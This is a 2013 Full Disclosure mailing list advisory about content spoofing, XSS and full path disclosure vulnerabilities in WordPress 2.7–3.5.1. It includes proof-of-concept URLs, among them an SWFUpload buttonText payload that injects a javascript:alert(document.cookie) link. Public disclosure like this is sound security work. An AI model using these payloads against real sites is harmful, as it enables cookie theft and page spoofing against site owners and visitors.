Full Disclosure mailing list archives
CS, XSS and FPD vulnerabilities in WordPress
From: "MustLive" <mustlive () websecurity com ua>
Date: Tue, 9 Jul 2013 23:51:22 +0300
Hello list! These are Content Spoofing, Cross-Site Scripting and Full path disclosure vulnerabilities in WordPress. At WordPress 3.5.2 release (the same at 3.5.1 release), WP developers mentioned about multiple fixed holes, but not about all - to make it looks like there were less fixed holes. So I'm revealing this information for you. In March I wrote about Content Spoofing and Cross-Site Scripting vulnerabilities in SWFUpload (http://securityvulns.ru/docs29181.html) (which is also bundled with WordPress), and I mentioned that they concerned only versions before WordPress 3.3.2 and were fixed in version 3.3.2 together with 2012's XSS hole. But I checked these holes in older versions of WP and in version 3.5.1. And as I found two weeks ago, these CS and XSS vulnerabilities were fixed exactly in WordPress 3.5.1. So versions 3.3.2 - 3.5 are still vulnerable, and in version 3.5.1 the developers included updated version of SWFUpload, without mentioning about these fixes (they like to do such things), only mentioned about the fixes in SWFUpload in version WP 3.5.2. There are fixed vulnerabilities in WordPress 3.5.2, which are not mentioned in announcement and codex. Like below mentioned Full path disclosure vulnerability (which I disclosed last week), even they have mentioned about FPD during upload. ------------------------- Affected products: ------------------------- For CS and XSS vulnerable are versions WordPress 2.7 - 3.5. For FPD vulnerable are versions WordPress 3.4 - 3.5.1. ---------- Details: ---------- Content Spoofing (WASC-12): http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E It's possible to inject text, images and html (e.g. for link injection). Cross-Site Scripting (WASC-08): http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Code will execute after click. It's strictly social XSS. Full path disclosure (WASC-13): http://site/wp-admin/users.php?s=http:// There is FPD when search string starts from http:// or https://. Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- CS, XSS and FPD vulnerabilities in WordPress MustLive (Jul 09)